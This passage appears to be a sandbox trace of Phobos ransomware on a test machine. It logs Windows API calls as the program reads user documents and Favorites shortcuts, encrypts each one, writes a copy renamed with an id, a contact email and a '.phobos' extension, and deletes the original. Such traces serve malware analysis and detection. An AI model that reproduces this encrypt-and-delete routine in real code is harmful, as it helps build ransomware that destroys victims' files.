pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.785] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.785] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.785] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.785] CloseHandle (hObject=0x178) returned 1 [0204.785] CloseHandle (hObject=0x124) returned 1 [0204.785] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\Cmo9R-1XTEaOu4GLH\\ioAZiZSgJKDJy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\cmo9r-1xteaou4glh\\ioazizsgjkdjy.odt")) returned 1 [0204.786] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\SiuhuZKaECuiEzUv.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\siuhuzkaecuiezuv.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.790] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=34027) returned 1 [0204.790] CloseHandle (hObject=0x124) returned 1 [0204.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\SiuhuZKaECuiEzUv.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\siuhuzkaecuiezuv.odt")) returned 0x20 [0204.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\SiuhuZKaECuiEzUv.odt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\siuhuzkaecuiezuv.odt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\SiuhuZKaECuiEzUv.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\siuhuzkaecuiezuv.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.792] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.792] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\SiuhuZKaECuiEzUv.odt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\siuhuzkaecuiezuv.odt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.793] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.793] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x84eb, lpOverlapped=0x0) returned 1 [0204.795] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x84f0, dwBufLen=0x84f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x84f0) returned 1 [0204.796] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x84f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x84f0, lpOverlapped=0x0) returned 1 [0204.798] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.798] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.798] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.798] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.798] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.798] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.798] CloseHandle (hObject=0x124) returned 1 [0204.798] CloseHandle (hObject=0x178) returned 1 [0204.798] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1siv16eVBt7Y-\\Z BKGrD4N\\SiuhuZKaECuiEzUv.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1siv16evbt7y-\\z bkgrd4n\\siuhuzkaecuiezuv.odt")) returned 1 [0204.800] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B5LfJ GwrrR6bKw.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b5lfj gwrrr6bkw.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.801] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=43681) returned 1 [0204.801] CloseHandle (hObject=0x178) returned 1 [0204.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B5LfJ GwrrR6bKw.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b5lfj gwrrr6bkw.odt")) returned 0x20 [0204.801] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B5LfJ GwrrR6bKw.odt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b5lfj gwrrr6bkw.odt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B5LfJ GwrrR6bKw.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b5lfj gwrrr6bkw.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.802] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.802] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B5LfJ GwrrR6bKw.odt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b5lfj gwrrr6bkw.odt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.803] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.803] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xaaa1, lpOverlapped=0x0) returned 1 [0204.805] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xaab0, dwBufLen=0xaab0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xaab0) returned 1 [0204.805] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xaab0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xaab0, lpOverlapped=0x0) returned 1 [0204.807] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0204.807] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.807] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0204.807] CryptDestroyKey (hKey=0xa32928) returned 1 [0204.807] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0204.807] CryptDestroyKey (hKey=0xa328e8) returned 1 [0204.807] CloseHandle (hObject=0x178) returned 1 [0204.807] CloseHandle (hObject=0x124) returned 1 [0204.808] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B5LfJ GwrrR6bKw.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b5lfj gwrrr6bkw.odt")) returned 1 [0204.809] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0204.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.811] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=29926) returned 1 [0204.811] CloseHandle (hObject=0x124) returned 1 [0204.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico")) returned 0x2 [0204.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0204.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0204.812] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.812] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0204.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0204.813] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0204.813] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0204.813] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x74e6, lpOverlapped=0x0) returned 1 [0205.023] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x74f0, dwBufLen=0x74f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x74f0) returned 1 [0205.023] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x74f0, lpOverlapped=0x0) returned 1 [0205.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.025] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.025] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0205.025] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.025] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0205.025] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.025] CloseHandle (hObject=0x124) returned 1 [0205.025] CloseHandle (hObject=0x178) returned 1 [0205.025] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico")) returned 1 [0205.026] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.026] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.027] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=236) returned 1 [0205.027] CloseHandle (hObject=0x178) returned 1 [0205.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url")) returned 0x20 [0205.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.027] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.027] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.028] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.028] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xec, lpOverlapped=0x0) returned 1 [0205.029] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0, dwBufLen=0xf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0) returned 1 [0205.029] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf0, lpOverlapped=0x0) returned 1 [0205.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.030] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.030] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.030] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.030] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.030] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.030] CloseHandle (hObject=0x178) returned 1 [0205.030] CloseHandle (hObject=0x124) returned 1 [0205.030] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url")) returned 1 [0205.031] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.032] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=226) returned 1 [0205.032] CloseHandle (hObject=0x124) returned 1 [0205.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url")) returned 0x20 [0205.032] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0205.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0205.032] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.032] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0205.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0205.033] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0205.033] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.033] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe2, lpOverlapped=0x0) returned 1 [0205.034] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0, dwBufLen=0xf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf0) returned 1 [0205.034] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf0, lpOverlapped=0x0) returned 1 [0205.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0205.036] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0205.036] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0205.036] CryptDestroyKey (hKey=0xa32a28) returned 1 [0205.036] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0205.037] CryptDestroyKey (hKey=0xa328e8) returned 1 [0205.037] CloseHandle (hObject=0x124) returned 1 [0205.037] CloseHandle (hObject=0x178) returned 1 [0205.037] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url")) returned 1 [0205.038] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0205.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 